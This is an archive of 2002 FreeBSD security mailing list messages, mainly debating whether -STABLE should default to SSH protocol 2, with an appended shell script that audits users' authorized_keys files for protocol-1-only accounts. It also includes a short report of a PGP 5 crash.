<3D27C9EA.6090207@yahoo.com> Date: Sat, 06 Jul 2002 23:56:10 -0500 From: Anthony Rubin User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jason Stone Cc: security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] References: <20020706204840.C2631-100000@walter> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) 
List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Do people who depend on such things run mergemaster and blindly accept all changes? Does everyone throw every new -RELEASE into production without any testing? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 22: 5:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B746F37B401 for ; Sat, 6 Jul 2002 22:05:44 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id C0F6E43E72 for ; Sat, 6 Jul 2002 22:05:41 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id F2C1E8B5DA; Sat, 6 Jul 2002 22:05:40 -0700 (PDT) Message-ID: <3D27CC1F.DBD85584@FreeBSD.org> Date: Sat, 06 Jul 2002 22:05:35 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.5-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Anthony Rubin Cc: Jason Stone , security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLEnow has OpenSSH 3.4p1] References: <20020706204840.C2631-100000@walter> <3D27C9EA.6090207@yahoo.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Anthony Rubin wrote: > > Do people who depend on such things run mergemaster and blindly accept > all changes? Does everyone throw every new -RELEASE into production > without any testing? You've missed the point. This would be an architectural change. 
We do those between branches, not towards the end of life of a -stable branch. Those who want protocol 2 to be the default have a simple config change to make... users expecting the RELENG_4 branch to actually be -stable shouldn't have their expectations so violently disturbed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 22:11: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 71F6D37B400 for ; Sat, 6 Jul 2002 22:10:59 -0700 (PDT) Received: from smtp018.mail.yahoo.com (smtp018.mail.yahoo.com [216.136.174.115]) by mx1.FreeBSD.org (Postfix) with SMTP id CC1BF43E3B for ; Sat, 6 Jul 2002 22:10:58 -0700 (PDT) (envelope-from anthonyrubin@yahoo.com) Received: from w184.z064001133.chi-il.dsl.cnc.net (HELO yahoo.com) (anthonyrubin@64.1.133.184 with plain) by smtp.mail.vip.sc5.yahoo.com with SMTP; 7 Jul 2002 05:10:58 -0000 Message-ID: <3D27CD60.8080906@yahoo.com> Date: Sun, 07 Jul 2002 00:10:56 -0500 From: Anthony Rubin User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Doug Barton Cc: Jason Stone , security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLEnow has OpenSSH 3.4p1] References: <20020706204840.C2631-100000@walter> <3D27C9EA.6090207@yahoo.com> <3D27CC1F.DBD85584@FreeBSD.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In order for this change to affect a user they would have to run mergemaster, see the change, and tell mergemaster to go ahead and merge or overwrite their config file. 
Do people let mergemaster overwrite /etc/groups and such? Doug Barton wrote: > Anthony Rubin wrote: > >>Do people who depend on such things run mergemaster and blindly accept >>all changes? Does everyone throw every new -RELEASE into production >>without any testing? > > > You've missed the point. This would be an architectural change. We do > those between branches, not towards the end of life of a -stable branch. > > Those who want protocol 2 to be the default have a simple config change > to make... users expecting the RELENG_4 branch to actually be -stable > shouldn't have their expectations so violently disturbed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 22:43: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ED0E537B400 for ; Sat, 6 Jul 2002 22:43:01 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id A77FD43E3B for ; Sat, 6 Jul 2002 22:43:01 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id B9B048B5C5; Sat, 6 Jul 2002 22:42:29 -0700 (PDT) Message-ID: <3D27D4C5.5BB6DC25@FreeBSD.org> Date: Sat, 06 Jul 2002 22:42:29 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.5-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Anthony Rubin Cc: Jason Stone , security@FreeBSD.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLEnowhas OpenSSH 3.4p1] References: <20020706204840.C2631-100000@walter> <3D27C9EA.6090207@yahoo.com> <3D27CC1F.DBD85584@FreeBSD.org> <3D27CD60.8080906@yahoo.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 
7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Anthony Rubin wrote:
>
> In order for this change to affect a user they would have to run
> mergemaster, see the change, and tell mergemaster to go ahead and merge
> or overwrite their config file.

Or, install a new box after wiping the old layout, or any number of scenarios. The point remains, we don't do changes like this within a -stable branch.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Jul 6 22:54:15 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F131337B400 for ; Sat, 6 Jul 2002 22:54:12 -0700 (PDT)
Received: from rip.psg.com (rip.psg.com [147.28.0.39]) by mx1.FreeBSD.org (Postfix) with ESMTP id B5B4E43E58 for ; Sat, 6 Jul 2002 22:54:12 -0700 (PDT) (envelope-from randy@psg.com)
Received: from localhost ([127.0.0.1] helo=rip.psg.com.psg.com) by rip.psg.com with esmtp (Exim 4.05) id 17R4zs-000LZb-00 for freebsd-security@freebsd.org; Sat, 06 Jul 2002 22:54:12 -0700
From: Randy Bush
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: freebsd-security@freebsd.org
Subject: signal 8 (fp execption) in pgp 5
Message-Id:
Date: Sat, 06 Jul 2002 22:54:12 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

yesterday's -stable and ports tree, rebuilt twice.

% pgpk -l randy
Type Bits KeyID      Created    Expires    Algorithm       Use
sec+ 1024 0xB1331439 1994-04-04 ---------- RSA             Sign & Encrypt
uid  Randy Bush
1 matching key found
Received signal 8.

anyone else see this or have a clue?
randy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
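
Added example, not part of any message in this archive: the "Default ssh protocol in -STABLE" thread above turns on which accounts hold only protocol 1 keys, since those are the logins that stop using their keys once protocol 2 is negotiated first. The script below counts protocol 1 and protocol 2 entries per account; the key-line formats and the authorized_keys/authorized_keys2 file names are assumed OpenSSH conventions, and the function names and sample keys are constructed for illustration.

```shell
#!/bin/sh
# Audit which accounts have only SSH protocol 1 authorized keys.
#
# Assumptions (OpenSSH conventions, not taken from the thread):
#   protocol 1 entry:  [options] <bits> <exponent> <modulus> [comment]
#   protocol 2 entry:  [options] ssh-rsa|ssh-dss <base64 blob> [comment]
#   keys live in ~/.ssh/authorized_keys and ~/.ssh/authorized_keys2

# Reads key entries on stdin, prints "<v1> <v2> <unknown>" counts.
classify_keys() {
    awk '
    function kind(s) {
        if (s ~ /^[0-9]+[ \t]+[0-9]+[ \t]+[0-9]+/) return "v1"
        if (s ~ /^ssh-(rsa|dss)[ \t]+AAAA/)        return "v2"
        return ""
    }
    # Drop a leading options field; quoted values may contain spaces.
    function skip_options(s,    i, c, inq) {
        inq = 0
        for (i = 1; i <= length(s); i++) {
            c = substr(s, i, 1)
            if (inq && c == "\\") { i++; continue }
            if (c == "\"") { inq = !inq; continue }
            if (!inq && (c == " " || c == "\t")) break
        }
        s = substr(s, i)
        sub(/^[ \t]+/, "", s)
        return s
    }
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    {
        line = $0
        sub(/^[ \t]+/, "", line)
        k = kind(line)
        if (k == "") k = kind(skip_options(line))
        if (k == "") k = "unknown"
        n[k]++
    }
    END { printf "%d %d %d\n", n["v1"], n["v2"], n["unknown"] }'
}

# Prints "<home> v1=<n> v2=<n> <verdict>" for each home directory given.
# V1-ONLY marks accounts whose key logins depend on protocol 1.
audit_homes() {
    for home in "$@"; do
        counts=$(cat "$home/.ssh/authorized_keys" \
                     "$home/.ssh/authorized_keys2" 2>/dev/null | classify_keys)
        v1=${counts%% *}
        rest=${counts#* }
        v2=${rest%% *}
        if   [ "$v1" -gt 0 ] && [ "$v2" -eq 0 ]; then verdict=V1-ONLY
        elif [ "$v1" -gt 0 ]; then verdict=both
        elif [ "$v2" -gt 0 ]; then verdict=v2
        else verdict=no-keys
        fi
        echo "$home v1=$v1 v2=$v2 $verdict"
    done
}

# Constructed sample data (shortened moduli and blobs, not real keys).
make_sample_homes() {
    mkdir -p "$1/alice/.ssh" "$1/bob/.ssh" "$1/cron/.ssh" "$1/dave/.ssh"
    cat > "$1/alice/.ssh/authorized_keys" <<'EOF'
# alice already moved to protocol 2
from="*.example.org" ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA alice@laptop
EOF
    cat > "$1/bob/.ssh/authorized_keys" <<'EOF'
1024 35 139016835701122334455 bob@workstation
EOF
    cat > "$1/bob/.ssh/authorized_keys2" <<'EOF'
ssh-dss AAAAB3NzaC1kc3MAAACBAPconstructed bob@workstation
EOF
    cat > "$1/cron/.ssh/authorized_keys" <<'EOF'
command="/usr/local/bin/backup --all",no-pty 1024 37 99887766554433 nightly
1024 35 55443322119988776655 cron@collector
EOF
}

# With arguments: audit those home directories. Without: run on the sample.
if [ "$#" -gt 0 ]; then
    audit_homes "$@"
else
    sample=$(mktemp -d) && make_sample_homes "$sample" &&
        audit_homes "$sample"/* && rm -rf "$sample"
fi
```

Run as root with the real home directories as arguments (for example `/home/*`) before changing a Protocol default; every V1-ONLY line is an account that needs a protocol 2 key or an explicit protocol 1 setting on its clients.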